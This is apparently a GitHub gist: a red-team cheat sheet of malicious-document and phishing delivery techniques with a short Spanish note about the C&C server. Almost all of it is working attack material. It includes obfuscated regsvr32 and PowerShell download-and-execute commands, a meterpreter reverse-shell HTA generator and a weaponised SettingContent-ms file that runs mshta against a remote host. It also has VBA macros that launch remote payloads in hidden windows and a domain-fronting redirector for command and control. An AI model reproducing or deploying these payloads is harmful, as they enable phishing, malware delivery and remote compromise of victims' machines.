Last active
August 27, 2022 13:24
-
-
Save adon90/7568d478541054d703b9af27ba96797e to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
1. Macro Web_Delivery + Invoke-Obfuscation | |
Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {WEBDELIVERY_PAYLOAD} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' | |
e.g | |
import-module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {regsvr32 /s /n /u /i:http://IP:8080/37yWWx.sct scrobj.dll} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' | |
2. Generate Macro (by enigma0x3) | |
iex(New-Object net.webClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generat | |
e-Macro/master/Generate-Macro.ps1'); | |
https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1 | |
3. Macroless OLE SettingContent-ms | |
python unicorn.py windows/meterpreter/reverse_https IP 443 hta | |
-------------------------- | |
<?xml version="1.0" encoding="UTF-8"?> | |
<PCSettings> | |
<SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent"> | |
<ApplicationInformation> | |
<AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID> | |
<DeepLink>C:\Windows\System32\mshta.exe http://192.168.1.43/LICENSE.txt</DeepLink> | |
<Icon>%windir%\system32\control.exe</Icon> | |
</ApplicationInformation> | |
<SettingIdentity> | |
<PageID></PageID> | |
<HostID>{12B1697E-D3A0-4DBC-B568-CCF64A3F934D}</HostID> | |
</SettingIdentity> | |
<SettingInformation> | |
<Description>@shell32.dll,-4161</Description> | |
<Keywords>@shell32.dll,-4161</Keywords> | |
</SettingInformation> | |
</SearchableContent> | |
</PCSettings> | |
-------------------------- | |
* Nota, dar permisos 644 a la Database en el C&C | |
4. .MAM Access Database | |
------------------------------ | |
Public Function runme() | |
runcalculator | |
End Function | |
Sub runcalculator() | |
Shell ("mshta.exe http://IP/LICENSE.txt") | |
End Sub | |
------------------------------ | |
5. SyncAppvPublishingServer | |
-------------------------------------------------- | |
Sub Macro() | |
Dim x64 As String | |
x64 = "SyncAppvPublishingServer.exe ""n;WEBDELIVERY_PAYLOAD_W/O_POWERSHELL""" | |
Const HIDDEN_WINDOW = 0 | |
strComputer = "." | |
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") | |
Set objStartup = objWMIService.Get("Win32_ProcessStartup") | |
Set objConfig = objStartup.SpawnInstance_ | |
objConfig.ShowWindow = HIDDEN_WINDOW | |
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process") | |
objProcess.Create x64 | |
End Sub | |
-------------------------------------------------------- | |
6. Domain Fronting + Phishing | |
Redirector: | |
socat TCP4-LISTEN:443,fork,reuseaddr TCP4:<C&C IP>:443 | |
C&C: | |
set LHOST mscrl.microsoft.com | |
set HttpHostHeader xxxxxxxxxxxxx.azureedge.net |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment